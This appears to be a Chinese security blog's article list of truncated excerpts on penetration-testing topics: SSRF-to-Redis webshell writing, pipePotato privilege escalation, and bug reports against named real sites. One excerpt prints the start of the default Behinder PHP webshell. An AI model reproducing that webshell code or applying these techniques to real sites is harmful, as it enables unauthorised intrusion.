文章列表
通过 SSRF 操作 Redis 主从复制写 Webshell
十篇想看的文章中就有八篇是这样的。 真鸡儿烦人,连续签到了差不多一年还是这样,没办法只能先水上去了。自己转载自己公开的文章应该不会被 ban 吧?Author : R3start and 曲云杰2020年4月1日19:57:37废话说起来很巧,这篇文章早就写完了,当时写完的时候并没有发出去,因为本想着等曲老板的其他东
冰蝎马 那可有可无的密码 -- 在爆菊的路上越走越远
冰蝎马 那可有可无的密码 -- 在爆菊的路上越走越远下面这个是默认的冰蝎马:<?php@error_reporting(0);session_start();if (isset($_GET)){ $key=substr(md5(uniqid(rand())),16); $_SESSION=$key; print $key;}else{ $key=$_SESSION;$post=file_get_contents("php://input").'';if(!exten
腾讯(qq.com)某分站绑定手机验证绕过
腾讯(qq.com)某分站绑定手机验证绕过
万能五笔输入法(wnwb.com)主站SQL注入漏洞
万能五笔输入法(wnwb.com)主站SQL注入漏洞
百度(baidu.com)下载页面CRLF注入漏洞
百度(baidu.com)下载页面CRLF注入漏洞
存在于自 2014 年以来所有三星手机中的高危漏洞终于被修复
三星本周发布了一个安全更新,修复了自2014年以来一直存在于旗下所有智能手机中的关键漏洞。该漏洞最早可以追溯到2014年下半年,三星开始在所有发布的设备中引入了对自定义Qmage图像格式(.qmg)的支持,而三星的定制Android系统在处理该图像格式上存在漏洞。 谷歌Project Zero的安全研究员Mateusz Ju
关于对违规会员@abuuu 的处理
经热心会员举报,会员@abuuu 涉嫌发布带后门源码,如图有关帖子链接如下https://www.t00ls.com/thread-56267-1-1.htmlhttps://www.t00ls.com/thread-54640-1-1.html经管理组核实,该会员严重违反了论坛有关规定第一部分 T00ls基本守则二、版块规则1、仅有七个版块可以发表主题贴:新闻动态、技术交流、
快手(kuaishou.cn)某分站短信轰炸漏洞
快手(kuaishou.cn)某分站短信轰炸漏洞
博客园(cnblogs.com)主站存储型XSS漏洞
博客园(cnblogs.com)主站存储型XSS漏洞
pipePotato复现
今天见安全客发了篇"首发披露!pipePotato:一种新型的通用提权漏洞"的文章,找了找资料复现了一下这里是原文对于漏洞的简介,废话不多说直接起环境开始复现。这里用到的环境是Windows Server 2019 Datacenter,起一个iis,做个简单的web随便挂个asp的shell上去,蚁剑直接连上当前webshell权限是iis ap